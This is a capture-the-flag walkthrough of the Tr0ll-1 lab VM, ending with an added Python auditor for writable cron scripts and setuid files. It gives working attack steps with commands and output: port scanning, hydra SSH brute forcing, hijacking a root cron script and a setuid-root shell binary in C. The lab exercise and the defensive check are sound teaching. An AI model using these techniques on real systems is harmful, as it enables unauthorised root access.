Tr0ll-1 VM download: https://www.vulnhub.com/entry/tr0ll-1,100/
Tr0ll was inspired by the machines that keep rotating through the OSCP labs. The goal is simple and clear: get root and read Proof.txt from root's home directory.
The difficulty isn't too high, so it shouldn't frustrate anyone. Friendly reminder: there are trolls ahead!
Difficulty: Beginner. Type: boot2root.
Download the VM, open it in VMware, and try everything you can to break in and get root.
On Windows, `arp -a` finds the VM's IP; on Linux, netdiscover does the same.
Run nmap against every port and see what's going on.
Findings: FTP allows anonymous access and holds a file called lol.pcap, and port 80 has a /secret directory.
```
root@kali:~/Desktop# nmap -p 1-65535 -sV -sS -A -T4 192.168.1.105

Starting Nmap 6.45 ( http://nmap.org ) at 2015-01-08 08:58 EST
Nmap scan report for 192.168.1.105
Host is up (0.00057s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09 23:43 lol.pcap [NSE: writeable]
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.45%I=7%D=1/8%Time=54AE8D09%P=i686-pc-linux-gnu%r(NULL,29
SF:,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
MAC Address: 00:0C:29:DF:FB:D1 (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.45%E=4%D=1/8%OT=21%CT=1%CU=42233%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM
OS:=54AE8D15%P=i686-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS
OS:=8)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M
OS:5B4ST11NW6%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=71
OS:20)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A
OS:%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y
OS:%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T
OS:=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.57 ms 192.168.1.105

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.58 seconds
```
The port results are as follows:
| Port | Service | Version Detection |
|---|---|---|
| TCP: 21 | FTP | vsftpd 3.0.2 |
| TCP: 22 | SSH | protocol 2.0 |
| TCP: 80 | HTTP | Apache httpd 2.4.7 ((Ubuntu)) |
```
root@kali:~/Desktop# ftp 192.168.1.105
Connected to 192.168.1.105.
220 (vsFTPd 3.0.2)
Name (192.168.1.105:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 09 23:43 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.03 secs (247.7 kB/s)
ftp> exit
221 Goodbye.
```
Anonymous FTP login (anonymous/anonymous) gets us a packet capture, lol.pcap.
Opening lol.pcap in Wireshark reveals these hints:
FTP Data (-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt)
and
FTP Data (Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛 Sucks, you were so close… gotta TRY HARDER!)
Since only SSH/FTP/HTTP were found, I quickly tried root/sup3rs3cr3tdirlol over SSH. It failed!
```
root@kali:~/Desktop# nmap --script=http-enum -p80 -n 192.168.1.105

Starting Nmap 6.45 ( http://nmap.org ) at 2015-01-08 09:23 EST
Nmap scan report for 192.168.1.105
Host is up (0.00048s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-enum:
|   /robots.txt: Robots file
|_  /secret/: Potentially interesting folder
MAC Address: 00:0C:29:DF:FB:D1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds
```
The web page looks like this:
Following the nmap results, I opened http://192.168.1.105/secret/ in the browser and found a silly image. The page source showed nothing, and poking at the image turned up nothing either.
Then it hit me: look closely at that l33t string. Isn't it saying
sup3rs3cr3tdirlol supersecretdirlol super secret dir lol
Enter sup3rs3cr3tdirlol as a directory and... heh heh heh.
http://192.168.1.105/sup3rs3cr3tdirlol/
This yields a binary, roflmao; `strings` lists its printable strings:
```
root@kali:~/Desktop/ted# strings roflmao
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed
;*2$"
```
It looks like the binary just prints "0x0856BF"? So I casually tried 0x0856BF as a directory after the IP. I didn't expect it to work, but a miracle happened. Miracles do exist after all; you never know until you try.
The first directory looks like this:
http://192.168.1.105/0x0856BF/good_luck/which_one_lol.txt
```
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
```
The second directory contains this txt:
http://192.168.1.105/0x0856BF/this_folder_contains_the_password/Pass.txt
Good_job_:)
Use which_one_lol.txt as the username list and Pass.txt as the password list, and run hydra with a single thread:
```
root@kali:~/Desktop/ted# hydra -L which_one_lol.txt -P Pass.txt 192.168.1.105 -t 1 ssh -vV
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-01-08 09:36:58
[DATA] 1 task, 1 server, 10 login tries (l:10/p:1), ~10 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.1.105 - login "overflow" - pass "Good_job_:)" - 1 of 10 [child 0]
[ERROR] could not connect to target port 22
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.1.105 - login "overflow" - pass "Good_job_:)" - 1 of 10 [child 0]
[ERROR] could not connect to target port 22
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.1.105 - login "overflow" - pass "Good_job_:)" - 1 of 10 [child 0]
[ERROR] could not connect to target port 22
[ERROR] ssh protocol error
[ERROR] Too many connect errors to target, disabling ssh://192.168.1.105:22
0 of 1 target completed, 0 valid passwords found
[ERROR] 1 target did not resolve or could not be connected
Hydra (http://www.thc.org/thc-hydra) finished at 2015-01-08 09:36:59
```
The brute force errored out and failed; my guess was that iptables was limiting connections. After a long think, I tried the password literally as "Pass.txt". Mildly depressing.
```
root@kali:~/Desktop/ted# hydra -L which_one_lol.txt -p Pass.txt 192.168.1.105 -t 1 ssh -vV
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-01-08 09:38:13
[DATA] 1 task, 1 server, 10 login tries (l:10/p:1), ~10 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.1.105 - login "overflow" - pass "Pass.txt" - 1 of 10 [child 0]
[22][ssh] host: 192.168.1.105   login: overflow   password: Pass.txt
[ATTEMPT] target 192.168.1.105 - login "maleus" - pass "Pass.txt" - 2 of 10 [child 0]
[ATTEMPT] target 192.168.1.105 - login "ps-aux" - pass "Pass.txt" - 3 of 10 [child 0]
[ATTEMPT] target 192.168.1.105 - login "felux" - pass "Pass.txt" - 4 of 10 [child 0]
[ATTEMPT] target 192.168.1.105 - login "Eagle11" - pass "Pass.txt" - 5 of 10 [child 0]
[ATTEMPT] target 192.168.1.105 - login "genphlux" - pass "Pass.txt" - 6 of 10 [child 0]
[ATTEMPT] target 192.168.1.105 - login "usmc8892" - pass "Pass.txt" - 7 of 10 [child 0]
```
Once logged in, the account lacks privileges, so this calls for privilege escalation. Also, after a short while the session gets kicked with the message TIMES UP LOL!
```
root@kali:~# ssh 192.168.1.105 -l overflow
The authenticity of host '192.168.1.105 (192.168.1.105)' can't be established.
ECDSA key fingerprint is 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.105' (ECDSA) to the list of known hosts.
overflow@192.168.1.105's password:
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Thu Jan  8 06:45:19 2015
Could not chdir to home directory /home/overflow: No such file or directory
$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)
$
```
Download an enumeration script and list the writable files:
```
#########################################
## 777 Files ##
#########################################
/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/lib/log/cleaner.py
```
/lib/log/cleaner.py runs with root privileges: a crontab entry calls it periodically to clean out the tmp directory.
/opt/lmao.py can't be read with our permissions, so overwrite cleaner.py so that root dumps it for us:
```python
import os

# run by root's cron job: copy the unreadable script somewhere we can read it
os.system('/opt/lmao.py > /tmp/out.txt')
```
out.txt now shows the code of lmao.py:
```python
#!/usr/bin/env python
import os
import sys

# broadcast the troll message, then kill every process of the overflow user
os.system('echo "TIMES UP LOL!"|wall')
os.system("pkill -u 'overflow'")
sys.exit()
```
Compile our SUID binary and upload it with wget:
```c
#include <stdlib.h>
#include <unistd.h>

/* once root's cron job has made this file setuid-root, it drops into a root shell */
int main(void) {
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}
```
Then replace cleaner.py with:
```python
#!/usr/bin/env python
import os
import sys

try:
    # root's cron job makes our uploaded binary owned by root and setuid
    os.system('chown root:root /var/tmp/suid; chmod 4777 /var/tmp/suid')
except:
    sys.exit()
```
Reconnect after a little while, run our suid binary, and we're root:
```
:# /var/tmp/suid
:# cat /root/proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc
:# id
uid=0(root) gid=0(root) groups=0(root),1002(overflow)
:# whoami
root
```
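From the defender's side, the two weaknesses this box chains are a world-writable script that root's cron executes and a setuid-root binary planted in /var/tmp. The Python below is an added example (not from the original walkthrough or the VM) that audits both; the crontab text, the cron job path and the temp-dir layout are constructed for the demo.

```python
import os
import stat
import tempfile
# Constructed /etc/crontab excerpt modelled on the Tr0ll-1 root job above (path assumed).
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
*/2 * * * * root /usr/bin/python /lib/log/cleaner.py
"""

def cron_script_paths(crontab_text):
    """Absolute paths in the command field of system-crontab lines."""
    paths = []
    for line in crontab_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue  # blank, comment or VAR=value line
        # system crontab: five time fields, a user, then the command
        paths += [tok for tok in fields[6:] if tok.startswith("/")]
    return paths

def audit_cron_scripts(crontab_text):
    findings = []  # (path, problem) for each existing cron-invoked path root should not trust
    for path in filter(os.path.exists, cron_script_paths(crontab_text)):
        st = os.stat(path)
        if st.st_mode & stat.S_IWOTH:       # the cleaner.py weakness used above
            findings.append((path, "world-writable"))
        elif st.st_uid != 0:                # owner can edit what root will run
            findings.append((path, "not owned by root"))
    return findings

def suid_files(root_dir):
    """Regular files under root_dir with the setuid bit (e.g. /var/tmp/suid)."""
    hits = []
    for dirpath, _, names in os.walk(root_dir):
        for name in names:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(p)
    return sorted(hits)

def demo():
    """Recreate the vulnerable layout in a temp dir (constructed) and audit it."""
    base = tempfile.mkdtemp()
    cleaner, planted = os.path.join(base, "cleaner.py"), os.path.join(base, "suid")
    for p, mode in ((cleaner, 0o777), (planted, 0o4755)):
        open(p, "w").close()
        os.chmod(p, mode)
    crontab = SAMPLE_CRONTAB.replace("/lib/log/cleaner.py", cleaner)
    return audit_cron_scripts(crontab), suid_files(base)
```

Pointing `audit_cron_scripts` at the real /etc/crontab and `suid_files` at /tmp and /var/tmp on a live host flags exactly the two conditions the walkthrough relies on.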
[Reference: Tr0ll 1 Walkthrough & THERE BE TROLLS AHEAD! Author: 上头欢乐送]